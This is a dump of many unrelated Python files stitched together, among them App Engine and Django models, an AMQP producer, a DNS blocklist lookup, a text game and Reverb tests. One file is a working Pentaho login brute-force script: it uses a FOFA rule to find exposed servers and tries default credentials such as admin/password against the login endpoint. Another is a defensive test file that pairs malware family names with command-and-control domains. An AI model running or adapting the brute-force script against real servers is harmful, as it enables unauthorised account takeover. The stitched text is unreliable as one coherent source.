"""
Copyright Tiyab KONLAMBIGUE
Licensed under the BSD 3-Clause "New" or "Revised" license;
you may not use this file except in compliance with the License.
You may obtain a copy of the License at : https://opensource.org/licenses/BSD-3-Clause
"""
from google.appengine.ext import ndb
class Job(ndb.Model):
creation = ndb.DateTimeProperty(auto_now_add=True)
updated = ndb.DateTimeProperty(auto_now=True)
emails = ndb.StringProperty()
project_id = ndb.StringProperty()
bucket_id = ndb.StringProperty()
machine_name = ndb.StringProperty()
startup_script = ndb.StringProperty()
shutdown_script = ndb.StringProperty()
machine_type = ndb.StringProperty()
machine_zone = ndb.StringProperty()
machine_os = ndb.StringProperty()
cron_schedule = ndb.StringProperty()
after_run = ndb.StringProperty()
max_running_time = ndb.StringProperty()
job_name = ndb.StringProperty()
job_status = ndb.StringProperty()
last_run = ndb.DateTimeProperty()
    # Get list of jobs
@classmethod
    def query(cls, query, max_line):
results = []
query = ndb.GqlQuery(query)
for query_line in query.run(limit=max_line):
results.append(query_line)
return results
# Get job
def get(self, filtering):
results = []
query = self.gql(filtering)
for query_line in query:
results.append(query_line)
return results
def to_dict(self):
return {
"key": self.key.urlsafe() if self.key else None,
"creation": str(self.creation) if self.creation else None,
"updated": str(self.updated) if self.updated else None,
"emails": str(self.emails) if self.emails else None,
"project": str(self.project) if self.project else None,
"bucket_id": str(self.bucket_id) if self.bucket_id else None,
"machine_name": str(self.machine_name) if self.machine_name else None,
"startup_script": str(self.startup_script) if self.startup_script else None,
"shutdown_script": str(self.shutdown_script) if self.shutdown_script else None,
"machine_type": str(self.machine_type) if self.machine_type else None,
"machine_zone": str(self.machine_zone) if self.machine_zone else None,
"machine_os": str(self.machine_os) if self.machine_os else None,
"after_run": str(self.after_run) if self.after_run else None,
"cron_schedule": str(self.cron_schedule) if self.cron_schedule else None,
"max_running_time": str(self.max_running_time) if self.max_running_time else None,
"job_name": str(self.job_name) if self.job_name else None,
"job_status": str(self.job_status) if self.job_status else None,
"last_run": str(self.last_run) if self.last_run else None,
}
## JOB TO RUN QUEUE
class Queue(ndb.Model):
creation = ndb.DateTimeProperty(auto_now_add=True)
project_id = ndb.StringProperty()
bucket_id = ndb.StringProperty()
machine_name = ndb.StringProperty()
machine_type = ndb.StringProperty()
machine_zone = ndb.StringProperty()
machine_os = ndb.StringProperty()
after_run = ndb.StringProperty()
max_running_time = ndb.StringProperty()
job_name = ndb.StringProperty()
    # Get list of jobs
@classmethod
    def query(cls, query, max_line):
results = []
query = ndb.GqlQuery(query)
for query_line in query.run(limit=max_line):
results.append(query_line)
return results
# Get job
def get(self, filtering):
results = []
query = self.gql(filtering)
for query_line in query:
results.append(query_line)
return results
def to_dict(self):
return {
"key": self.key.urlsafe() if self.key else None,
"creation": str(self.creation) if self.creation else None,
"project": str(self.project) if self.project else None,
"bucket_id": str(self.bucket_id) if self.bucket_id else None,
"machine_name": str(self.machine_name) if self.machine_name else None,
"machine_type": str(self.machine_type) if self.machine_type else None,
"machine_zone": str(self.machine_zone) if self.machine_zone else None,
"machine_os": str(self.machine_os) if self.machine_os else None,
"after_run": str(self.after_run) if self.after_run else None,
"max_running_time": str(self.max_running_time) if self.max_running_time else None,
"job_name": str(self.job_name) if self.job_name else None,
"job_status": str(self.job_status) if self.job_status else None,
}
|
python
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import print_function, unicode_literals
import optparse
from proton import Message
from proton.handlers import MessagingHandler
from proton.reactor import Container
# Helper Functions
def get_options():
#parse cmd arguments
parser = optparse.OptionParser(usage="usage: %prog [options]",
description="Sends messages to a topic on the amqp broker")
parser.add_option("-u", "--url", action="store", default="amqp://localhost:5672",
help="Url to connect to amqp broker (default %default)")
parser.add_option("-t", "--topic", action="store", default="a/topic",
help="Topic to send message (default %default)")
parser.add_option("-m", "--messages", type="int", default=100,
help="number of messages to receive (default %default)")
parser.add_option("-o", "--username", default=None,
help="username for authentication (default %default)")
parser.add_option("-p", "--password", default=None,
help="password for authentication (default %default)")
(options, args) = parser.parse_args()
return options
"""
Proton event Handler class
Establishes an amqp connection and creates an amqp sender link to transmit messages
"""
class MessageProducer(MessagingHandler):
def __init__(self, url, address, count, username, password):
super(MessageProducer, self).__init__()
# the solace message broker amqp url
self.url = url
# the prefix amqp address for a solace topic
self.topic_address = address
# authentication credentials
self.username = username
self.password = password
self.total = count
self.sent = 0
self.confirmed = 0
def on_start(self, event):
# select authentication from SASL PLAIN or SASL ANONYMOUS
if self.username:
# creates and establishes amqp connection using PLAIN authentication
conn = event.container.connect(url=self.url,
user=self.username,
password=self.password,
allow_insecure_mechs=True)
else:
# creates and establishes amqp connection using ANONYMOUS authentication
conn = event.container.connect(url=self.url)
if conn:
# creates sender link to transfer message to the broker
event.container.create_sender(conn, target=self.topic_address)
def on_sendable(self, event):
while event.sender.credit and self.sent < self.total:
            # durable=True marks the message as persistent on the broker
event.sender.send(Message(body="hello "+str(self.sent), durable=True))
self.sent += 1
def on_accepted(self, event):
self.confirmed += 1
if self.confirmed == self.total:
print('confirmed all messages')
event.connection.close()
def on_rejected(self, event):
self.confirmed += 1
print("Broker", self.url, "Reject message:", event.delivery.tag, "Remote disposition:", event.delivery.remote.condition)
if self.confirmed == self.total:
event.connection.close()
# receives socket or authentication failures
def on_transport_error(self, event):
print("Transport failure for amqp broker:", self.url, "Error:", event.transport.condition)
MessagingHandler.on_transport_error(self, event)
# get program options
options = get_options()
"""
The amqp address can be a topic or a queue.
Use 'topic://' prefix in the amqp address for the amqp sender
target address to indicate which topic messages are sent to.
"""
amqp_address = 'topic://' + options.topic
try:
# starts the proton container event loop with the MessageProducer event handler
Container(MessageProducer(options.url, amqp_address, options.messages, options.username, options.password)).run()
except KeyboardInterrupt: pass
|
python
|
# tuples are like lists, but immutable
# the syntax is ( parentheses )
# list
l = [1,2,3]
l[0] = 5 # you can do this
print(type(l))
print(l)
# tuple
t = (1,2,3)
# t[0] = 5 # you can't do this
print(type(t))
print(t)
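# A short illustrative addition (not in the original snippet): assigning into
# a tuple raises a TypeError at runtime.
try:
    t[0] = 5
except TypeError as err:
    print(f"tuples are immutable: {err}")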
# tuples only have two methods, far fewer than lists
t = ('a', 'a', 'b', 'b', 'c', 'c')
print(f"the amount of instances of the character 'a' in the tuple is {t.count('a')}")
print(f"the first index in the tuple that has the character 'c' is {t.index('c')}")
|
python
|
import sys
import re
from functools import partial
def flush_print(st, *args, **kwargs):
end = kwargs.pop('end', '\n')
if args:
st = st % args
print(st, end=end)
if sys.stdout.isatty():
sys.stdout.flush()
def cprint(color_fn, st, *args):
if args:
st = st % args
print(color_fn(st), end='')
sys.stdout.flush()
def dot_lead(st, *args, **kwargs):
width = kwargs.pop('width', 60)
if args:
st = st % args
dots = '.' * (width - len(st))
return '%s%s' % (st, dots)
def dot_leader(st, *args, **kwargs):
width = kwargs.pop('width', 60)
if args:
st = st % args
dots = '.' * (width - len(st))
flush_print('%s%s', st, dots, **kwargs)
COLORS = (
'black', 'red', 'green', 'yellow',
'blue', 'magenta', 'cyan', 'white')
STYLES = (
'bold', 'faint', 'italic', 'underline',
'blink', 'blink2', 'negative',
'concealed', 'crossed')
def _ansi_color(x, offset, ansi_code):
if x:
if x in COLORS:
return [ f'{offset + COLORS.index(x)}' ]
if isinstance(x, int) and 0 <= x <= 255:
return [ f'{ansi_code};5;{x}' ]
        raise Exception(f'Invalid color [{x}]')
return []
def _style_codes(style):
codes = []
if style:
for st in style.split('+'):
if st in STYLES:
codes.append(f'{(1 + STYLES.index(st))}')
else:
                raise Exception(f'Invalid style "{st}"')
return codes
def color(s, fg=None, bg=None, style=None):
sgr = _ansi_color(fg, 30, 38) + _ansi_color(bg, 40, 48)
sgr += _style_codes(style)
if sgr:
return f"\x1b[{';'.join(sgr)}m{s}\x1b[0m"
return s
def strip_color(s):
return re.sub(r'\x1b\[.+?m', '', s)
# Foreground shortcuts
black = partial(color, fg='black')
red = partial(color, fg='red')
green = partial(color, fg='green')
yellow = partial(color, fg='yellow')
blue = partial(color, fg='blue')
magenta = partial(color, fg='magenta')
cyan = partial(color, fg='cyan')
white = partial(color, fg='white')
# Style shortcuts
bold = partial(color, style='bold')
faint = partial(color, style='faint')
italic = partial(color, style='italic')
underline = partial(color, style='underline')
blink = partial(color, style='blink')
blink2 = partial(color, style='blink2')
negative = partial(color, style='negative')
concealed = partial(color, style='concealed')
crossed = partial(color, style='crossed')
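# Illustrative usage sketch (not part of the original module): the shortcuts
# compose, and strip_color removes the ANSI escape codes again.
if __name__ == '__main__':
    print(bold(red('error:')), 'something went wrong')
    print(color('highlight', fg='black', bg='yellow', style='underline'))
    dot_leader('checking colors')
    cprint(green, 'ok\n')
    print(strip_color(green('plain text')))  # prints 'plain text' without escapes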
|
python
|
#!/usr/bin/env python
print("hi from Python 3")
|
python
|
"""Background job to perform a DNS lookup and insert into or update in the db.
Attributes:
DNS_SERVERS: A list of strs representing which DNS servers to use
DNS_BLOCKLIST: A str representing the blocklist to send a DNS lookup to
"""
import dns.resolver
from models import IPDetails, ResponseCode
# Spamhaus will not work with Google's public DNS servers
# https://www.spamhaus.org/faq/section/DNSBL%20Usage#261
DNS_SERVERS = ["208.67.222.222"] # OpenDNS
DNS_BLOCKLIST = "zen.spamhaus.org"
def upsert_ip_details(ip_address):
"""Insert or update an IPDetails record in the db.
Args:
ip_address: A str representing the record in the db to insert or update
"""
response_codes = dns_lookup(ip_address)
ip_details = IPDetails.query.filter_by(ip_address=ip_address).first()
if ip_details is None:
ip_details = IPDetails(
response_codes=response_codes, ip_address=ip_address
)
ip_details.insert()
else:
ip_details.response_codes = response_codes
ip_details.update()
def dns_lookup(ip_address):
"""Perform a DNS lookup of an IP address to a blocklist.
Args:
ip_address: A str representing the ip address to perform a DNS lookup
against a blocklist
Returns:
response_codes: A list of ResponseCode objects representing the
returned response codes from the DNS lookup against a blocklist
"""
ip_address = ip_address.split(".")
if len(ip_address) != 4 or not all(num.isnumeric() for num in ip_address):
raise TypeError("Incorrect format for IPv4 IP Address")
ip_address = ".".join(reversed(ip_address))
response_codes = []
dns.resolver.get_default_resolver().nameservers = DNS_SERVERS
try:
answer = dns.resolver.resolve(f"{ip_address}.{DNS_BLOCKLIST}")
except dns.resolver.NXDOMAIN:
return response_codes
for data in answer:
response_code = ResponseCode.query.filter_by(
response_code=str(data)
).first()
if response_code is None:
response_code = ResponseCode(response_code=str(data))
response_code.insert()
response_codes.append(response_code)
return response_codes
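# Illustrative sketch (not part of the original job): the DNSBL query name is built
# by reversing the IPv4 octets and appending the blocklist zone; 127.0.0.2 is the
# conventional test address that DNS blocklists are expected to list.
if __name__ == "__main__":
    test_ip = "127.0.0.2"
    query_name = ".".join(reversed(test_ip.split("."))) + "." + DNS_BLOCKLIST
    print(query_name)  # -> 2.0.0.127.zen.spamhaus.org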
|
python
|
from scrapy import cmdline
if __name__ == '__main__':
# cmdline.execute('scrapy crawl xinFang'.split())
# cmdline.execute('scrapy crawl erShouFang'.split())
cmdline.execute('scrapy crawl zuFang'.split())
|
python
|
from .build_model import add_weights, build_model
|
python
|
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
import requests
from Config.config_requests import ua
requests.packages.urllib3.disable_warnings()
# Script information
######################################################
NAME = 'pentaho_bruteforce'
AUTHOR = "Trans"
REMARK = 'Pentaho password brute force'
FOFA_RULE = 'app="pentaho"'
######################################################
def poc(target):
result={}
url = target + "/pentaho"
refer = url+ "/Login"
url += "/j_spring_security_check"
login_headers = {
"User-Agent": ua,
"Referer": refer
}
webapp_usernames = {'admin':'password', 'joe': 'password', 'suzy': 'password', 'tiffany':'password', 'pat': 'password' }
for user in webapp_usernames:
path_store = ['/public/plugin-samples', '/public/bi-developers']
login_data = {"j_username": user, "j_password": webapp_usernames[user], "locale": "en_US"}
response = requests.post(url, headers=login_headers, data=login_data,verify=False,timeout=5)
if '/Home' in response.url:
print('Logging in as '+ user + ' / ' + webapp_usernames[user])
result['target'] = target
result['username'] = user
result['password'] = webapp_usernames[user]
return result
if __name__ == '__main__':
poc("http://127.0.0.1:3312")
|
python
|
# Copyright (c) 2019, Palo Alto Networks
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# Author: Giselle Serate <[email protected]>
'''
Palo Alto Networks testcases.py
Defines parameters for the test.
Include this file; do not run it directly.
This software is provided without support, warranty, or guarantee.
Use at your own risk.
'''
class ParseTest():
def __init__(self):
# Static version notes metadata
self.version = '3026-3536'
self.version_date = '2019-07-01T04:00:52-07:00'
# If we process this much or more, we pass
self.percent_processed = 0.5
# Establish cases to check are in the database.
self.cases = [{'raw': 'None:gacyqob.com', 'action': 'added'},
{'raw': 'Backdoor.simda:gahyraw.com', 'action': 'added'},
{'raw': 'None:pupycag.com', 'action': 'added'},
{'raw': 'PWS.simda:qetyhyg.com', 'action': 'added'},
{'raw': 'Backdoor.simda:vojykom.com', 'action': 'added'},
{'raw': 'Backdoor.simda:vowygem.com', 'action': 'added'},
{'raw': 'None:vowyzuk.com', 'action': 'added'},
{'raw': 'Worm.pykspa:agadss.biz', 'action': 'added'},
{'raw': 'Worm.pykspa:qgasocuiwcymao.info', 'action': 'added'},
{'raw': 'Worm.pykspa:ygsink.info', 'action': 'added'},
{'raw': 'Worm.ainslot:ryan12345.no-ip.biz', 'action': 'added'},
{'raw': 'TrojanDownloader.upatre:hngdecor.com', 'action': 'added'},
{'raw': 'TrojanDownloader.upatre:okeanbg.com', 'action': 'added'},
{'raw': 'TrojanDownloader.upatre:gert-hof.de', 'action': 'added'},
{'raw': 'Packed.fe:spaines.pw', 'action': 'added'},
{'raw': 'None:recdataoneveter.cc', 'action': 'added'},
{'raw': 'Backdoor.vawtrak:mbbllmv.eu', 'action': 'removed'},
{'raw': 'None:mfkxyucmxwhw.com', 'action': 'removed'},
{'raw': 'Worm.pykspa:kegbceiq.info', 'action': 'removed'},
{'raw': 'Virus.gippers:microsoft.mypicture.info', 'action': 'removed'},
{'raw': 'DDoS.nitol:a7677767.vicp.net', 'action': 'removed'},
{'raw': 'Worm.pykspa:yeuawkuiwcymao.info', 'action': 'removed'},
{'raw': 'None:zief.pl', 'action': 'removed'},
{'raw': 'Virus.palevogen:.banjalucke-ljepotice.ru', 'action': 'removed'},
{'raw': 'VirTool.ceeinject:digitalmind.cn', 'action': 'removed'},
{'raw': 'Virus.virut:irc.zief.pl', 'action': 'removed'},
{'raw': 'Trojan.dorv:lyvyxor.com', 'action': 'removed'},
{'raw': 'Virus.sality:sungkhomwit.com', 'action': 'removed'},
{'raw': 'Virus.sality:asesoriaenexposicion.com', 'action': 'removed'},
{'raw': 'TrojanSpy.nivdort:doubledistant.net', 'action': 'removed'},
{'raw': 'None:extsc.3322.org', 'action': 'removed'},
{'raw': 'Virus.sality:solitaireinfo.com', 'action': 'removed'}]
|
python
|
import pycountry
from matcher.server.main.elastic_utils import get_analyzers, get_char_filters, get_filters, get_index_name, get_mappings
from matcher.server.main.logger import get_logger
from matcher.server.main.my_elastic import MyElastic
SOURCE = 'country'
logger = get_logger(__name__)
def download_country_data():
countries = [c.__dict__['_fields'] for c in list(pycountry.countries)]
return countries
def transform_country_data(raw_data):
subdivision_name, subdivision_code = {}, {}
for subdivision in pycountry.subdivisions:
alpha2 = subdivision.country_code.lower()
if alpha2 not in subdivision_name:
subdivision_name[alpha2] = []
if alpha2 not in subdivision_code:
subdivision_code[alpha2] = []
subdivision_name[alpha2].append(subdivision.name)
if alpha2 == 'us':
subdivision_code[alpha2].append(subdivision.code[3:])
if alpha2 == 'gb':
subdivision_name[alpha2].append('northern ireland')
countries = []
for c in raw_data:
# Alpha 2 - 3
alpha2 = c['alpha_2'].lower()
alpha3 = c['alpha_3'].lower()
country = {'alpha2': alpha2, 'alpha3': [alpha3]}
if alpha2 == 'gb':
country['alpha3'].append('uk')
# Names
names = []
for field_name in ['name', 'official_name', 'common_name']:
if field_name in c:
names.append(c[field_name])
switcher = {
'bn': ['brunei'],
'ci': ['ivory coast'],
'cv': ['cape verde'],
'cz': ['czech'],
'de': ['deutschland'],
'gb': ['uk'],
'ir': ['iran'],
'kp': ['north korea'],
'kr': ['south korea', 'republic of korea'],
'la': ['laos'],
'mo': ['macau'],
'ru': ['russia'],
'sy': ['syria'],
'tw': ['taiwan'],
'us': ['usa'],
'vn': ['vietnam']
}
names += switcher.get(alpha2, [])
names = list(set(names))
country['name'] = names
# Subdivisions
if alpha2 in subdivision_name:
country['subdivision_name'] = list(set(subdivision_name[alpha2]))
country['subdivision_code'] = list(set(subdivision_code[alpha2]))
countries.append(country)
return countries
def load_country(index_prefix: str = 'matcher') -> dict:
es = MyElastic()
settings = {
'analysis': {
'char_filter': get_char_filters(),
'filter': get_filters(),
'analyzer': get_analyzers()
}
}
analyzers = {
'name': 'name_analyzer',
'subdivision_name': 'light',
'subdivision_code': 'light',
'alpha3': 'light'
}
criteria = list(analyzers.keys())
es_data = {}
for criterion in criteria:
index = get_index_name(index_name=criterion, source=SOURCE, index_prefix=index_prefix)
analyzer = analyzers[criterion]
es.create_index(index=index, mappings=get_mappings(analyzer), settings=settings)
es_data[criterion] = {}
raw_countries = download_country_data()
countries = transform_country_data(raw_countries)
# Iterate over country data
for country in countries:
for criterion in criteria:
            criterion_values = country.get(criterion)
            if criterion_values is None:
                logger.debug(f'This element {country} has no {criterion}')
                continue
            criterion_values = criterion_values if isinstance(criterion_values, list) else [criterion_values]
for criterion_value in criterion_values:
if criterion_value not in es_data[criterion]:
es_data[criterion][criterion_value] = []
es_data[criterion][criterion_value].append({'country_alpha2': country['alpha2']})
# Bulk insert data into ES
actions = []
results = {}
for criterion in es_data:
index = get_index_name(index_name=criterion, source=SOURCE, index_prefix=index_prefix)
analyzer = analyzers[criterion]
results[index] = len(es_data[criterion])
for criterion_value in es_data[criterion]:
if criterion_value:
action = {'_index': index,
'country_alpha2': list(set([k['country_alpha2'] for k in
es_data[criterion][criterion_value]])),
'query': {
'match_phrase': {'content': {'query': criterion_value, 'analyzer': analyzer, 'slop': 2}}}}
actions.append(action)
es.parallel_bulk(actions=actions)
return results
|
python
|
#--------------#
# Look Away! #
# By: Santo C. #
#--------------#
# Created October 26, 2006 (c) Santo C.
# Import the modules needed.
import random
from time import sleep
# Rules Document
Rules = """==========
Rules of the game:
------------------
Standing in front of you is your game host.
He will point in one direction, and you have to
face the other direction by selecting the direction.
For example, he will point left, which means you will
have to look right, and it's done in a split second,
so you never know...
Bonne Chance!
==========
"""
#
# -The Game Begins!-
#
print """--------------------------------------
+--------------+
| Look Away! |
| By: Santo C. |
+--------------+
How to play:
Look the other way from the game host!
--------------------------------------
Look Away! (c) 2006 Santo C.
--------------------------------------
"""
#Game Loop
while True:
print "-=MAIN MENU=-"
print "1) Game Rules"
print "2) Play"
print "3) Quit Game"
SLCT = raw_input("Select Choice: ")
print
if SLCT == '1': # List rules here.
print Rules
elif SLCT == '2':
print "Alright, let's play!"
print
sleep(2)
print "(The game host approaches you for the game...)"
print
sleep(2)
print "Host: Hello there! Let's play some Look Away!"
print
sleep(2)
print "Host: Right... When you're ready..."
print "... You can look to the Left, or the Right, or quit at any time."
print
sleep(2)
while True:
print "(Which way will you look?)"
Direction = raw_input('(1) Left / (2) Right / (3) Quit : ')
print
if Direction == '1':
sleep(2)
print "(You will look to the left...)"
print
sleep(2)
print "Host: Ready? And..."
print
sleep(2)
HostDirection = str(random.randrange(1,3))
print "GO!"
print "You: ", '<='
if HostDirection == '1': print "Host:", '<='
elif HostDirection == '2': print "Host:", '=>'
print
sleep(2)
if HostDirection != Direction:
print "Host: Good, you looked the other way! You win!"
print
elif HostDirection == Direction:
print "Host: Hah, you looked my direction! You lose!"
print
elif Direction == '2':
sleep(2)
print "(You will look to the right...)"
print
sleep(2)
print "Host: Ready? And..."
print
sleep(2)
HostDirection = str(random.randrange(1,3))
print "GO!"
print "You: ", '=>'
if HostDirection == '1': print "Host:", '<='
elif HostDirection == '2': print "Host:", '=>'
print
sleep(2)
if HostDirection != Direction:
print "Host: Good, you looked the other way! You win!"
print
elif HostDirection == Direction:
print "Host: Hah, you looked my direction! You lose!"
print
sleep(2)
elif Direction == '3':
break
else:
print
print "Please select an option!"
print
elif SLCT == '3':
print "Alright then. About face, and goodbye! :)"
sleep(2)
break
else:
print "Please select an option!"
print
|
python
|
from django.db import models
# model to store incoming unpaid cheque details
class UnpaidCheque(models.Model):
raw_string = models.CharField(max_length=100)
voucher_code = models.CharField(max_length=3)
cheque_number = models.CharField(max_length=100)
reason_code = models.CharField(max_length=3)
cheque_amount = models.DecimalField(max_digits=9, decimal_places=2)
cheque_value_date = models.DateField()
ft_ref = models.CharField(max_length=100, blank=True, null=True)
logged_at = models.DateTimeField(auto_now_add=True)
is_unpaid = models.BooleanField(default=False)
unpaid_value_date = models.DateField(blank=True, null=True)
cc_record = models.CharField(max_length=100, blank=True, null=True)
unpay_success_indicator = models.CharField(max_length=50, blank=True, null=True)
unpay_error_message = models.CharField(max_length=100, blank=True, null=True)
cheque_account = models.CharField(max_length=100, blank=True, null=True)
owner = models.ForeignKey('auth.User', related_name='unpaid_cheques', on_delete=models.CASCADE)
def __str__(self):
return self.ft_ref
class Meta:
ordering = ['logged_at']
# model to store charge details
class Charge(models.Model):
charge_id = models.CharField(max_length=100)
charge_account = models.CharField(max_length=100)
charge_amount = models.DecimalField(max_digits=9, decimal_places=2)
charge_value_date = models.DateField()
charge_success_indicator = models.CharField(max_length=50, blank=True, null=True)
ofs_id = models.CharField(max_length=100, blank=True, null=True)
ft_ref = models.CharField(max_length=100, blank=True, null=True)
is_collected = models.BooleanField(default=False)
charge_error_message = models.CharField(max_length=100, blank=True, null=True)
cc_record = models.ForeignKey('UnpaidCheque', related_name='charges', on_delete=models.CASCADE)
owner = models.ForeignKey('auth.User', related_name='charges', on_delete=models.CASCADE)
def __str__(self):
return self.charge_id
class Meta:
ordering = ['charge_id']
|
python
|
# Copyright 2019 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for reverb.trajectory_writer."""
from typing import Optional
from unittest import mock
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from reverb import client as client_lib
from reverb import pybind
from reverb import server as server_lib
from reverb import trajectory_writer
import tree
class FakeWeakCellRef:
def __init__(self, data):
self.data = data
@property
def shape(self):
return np.asarray(self.data).shape
@property
def dtype(self):
return np.asarray(self.data).dtype
def extract_data(column: trajectory_writer._ColumnHistory):
return [ref.data if ref else None for ref in column]
def _mock_append(x):
return [FakeWeakCellRef(y) if y is not None else None for y in x]
class TrajectoryWriterTest(parameterized.TestCase):
def setUp(self):
super().setUp()
self.cpp_writer_mock = mock.Mock()
self.cpp_writer_mock.Append.side_effect = _mock_append
self.cpp_writer_mock.AppendPartial.side_effect = _mock_append
self.writer = trajectory_writer.TrajectoryWriter(self.cpp_writer_mock)
def test_history_require_append_to_be_called_before(self):
with self.assertRaises(RuntimeError):
_ = self.writer.history
def test_history_contains_references_when_data_flat(self):
self.writer.append(0)
self.writer.append(1)
self.writer.append(2)
history = tree.map_structure(extract_data, self.writer.history)
self.assertListEqual(history, [0, 1, 2])
def test_history_contains_structured_references(self):
self.writer.append({'x': 1, 'y': 100})
self.writer.append({'x': 2, 'y': 101})
self.writer.append({'x': 3, 'y': 102})
history = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(history, {'x': [1, 2, 3], 'y': [100, 101, 102]})
def test_history_structure_evolves_with_data(self):
self.writer.append({'x': 1, 'z': 2})
first = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(first, {'x': [1], 'z': [2]})
self.writer.append({'z': 3, 'y': 4})
second = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(second, {
'x': [1, None],
'z': [2, 3],
'y': [None, 4],
})
self.writer.append({'w': 5})
third = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(third, {
'x': [1, None, None],
'z': [2, 3, None],
'y': [None, 4, None],
'w': [None, None, 5],
})
self.writer.append({'x': 6, 'w': 7})
forth = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(forth, {
'x': [1, None, None, 6],
'z': [2, 3, None, None],
'y': [None, 4, None, None],
'w': [None, None, 5, 7],
})
@parameterized.named_parameters(
('tuple', (0,), (0, 1)),
('dict', {'x': 0}, {'x': 0, 'y': 1}),
('list', [0], [0, 1]),
)
def test_append_with_more_fields(self, first_step_data, second_step_data):
self.writer.append(first_step_data)
self.writer.append(second_step_data)
def test_append_returns_same_structure_as_data(self):
first_step_data = {'x': 1, 'y': 2}
first_step_ref = self.writer.append(first_step_data)
tree.assert_same_structure(first_step_data, first_step_ref)
# Check that this holds true even if the data structure changes between
# steps.
second_step_data = {'y': 2, 'z': 3}
second_step_ref = self.writer.append(second_step_data)
tree.assert_same_structure(second_step_data, second_step_ref)
def test_append_forwards_flat_data_to_cpp_writer(self):
data = {'x': 1, 'y': 2}
self.writer.append(data)
self.cpp_writer_mock.Append.assert_called_with(tree.flatten(data))
def test_partial_append_appends_to_the_same_step(self):
# Create a first step and keep it open.
self.writer.append({'x': 1, 'z': 2}, partial_step=True)
first = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(first, {'x': [1], 'z': [2]})
# Append to the same step and keep it open.
self.writer.append({'y': 4}, partial_step=True)
second = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(second, {
'x': [1],
'z': [2],
'y': [4],
})
# Append to the same step and close it.
self.writer.append({'w': 5})
third = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(third, {
'x': [1],
'z': [2],
'y': [4],
'w': [5],
})
# Append to a new step.
self.writer.append({'w': 6})
forth = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(forth, {
'x': [1, None],
'z': [2, None],
'y': [4, None],
'w': [5, 6],
})
def test_columns_must_not_appear_more_than_once_in_the_same_step(self):
# Create a first step and keep it open.
self.writer.append({'x': 1, 'z': 2}, partial_step=True)
# Add another unseen column alongside an existing column with a None value.
self.writer.append({'x': None, 'y': 3}, partial_step=True)
# Provide a value for a field that has already been set in this step.
with self.assertRaisesRegex(
ValueError,
r'Field \(\'x\',\) has already been set in the active step by previous '
r'\(partial\) append call and thus must be omitted or set to None but '
r'got: 4'):
self.writer.append({'x': 4})
def test_create_item_checks_type_of_leaves(self):
first = self.writer.append({'x': 3, 'y': 2})
second = self.writer.append({'x': 3, 'y': 2})
# History automatically transforms data and thus should be valid.
self.writer.create_item('table', 1.0, {
'x': self.writer.history['x'][0], # Just one step.
'y': self.writer.history['y'][:], # Two steps.
})
# Columns can be constructed explicitly.
self.writer.create_item('table', 1.0, {
'x': trajectory_writer.TrajectoryColumn([first['x']]),
'y': trajectory_writer.TrajectoryColumn([first['y'], second['y']])
})
# But all leaves must be TrajectoryColumn.
with self.assertRaises(TypeError):
self.writer.create_item('table', 1.0, {
'x': trajectory_writer.TrajectoryColumn([first['x']]),
'y': first['y'],
})
  def test_flush_checks_block_until_num_items(self):
self.writer.flush(0)
self.writer.flush(1)
with self.assertRaises(ValueError):
self.writer.flush(-1)
def test_configure_uses_auto_tune_when_max_chunk_length_not_set(self):
self.writer.append({'x': 3, 'y': 2})
self.writer.configure(('x',), num_keep_alive_refs=2, max_chunk_length=None)
self.cpp_writer_mock.ConfigureChunker.assert_called_with(
0,
pybind.AutoTunedChunkerOptions(
num_keep_alive_refs=2, throughput_weight=1.0))
def test_configure_seen_column(self):
self.writer.append({'x': 3, 'y': 2})
self.writer.configure(('x',), num_keep_alive_refs=2, max_chunk_length=1)
self.cpp_writer_mock.ConfigureChunker.assert_called_with(
0,
pybind.ConstantChunkerOptions(
num_keep_alive_refs=2, max_chunk_length=1))
def test_configure_unseen_column(self):
self.writer.append({'x': 3, 'y': 2})
self.writer.configure(('z',), num_keep_alive_refs=2, max_chunk_length=1)
# The configure call should be delayed until the column has been observed.
self.cpp_writer_mock.ConfigureChunker.assert_not_called()
# Still not seen.
self.writer.append({'a': 4})
self.cpp_writer_mock.ConfigureChunker.assert_not_called()
self.writer.append({'z': 5})
self.cpp_writer_mock.ConfigureChunker.assert_called_with(
3,
pybind.ConstantChunkerOptions(
num_keep_alive_refs=2, max_chunk_length=1))
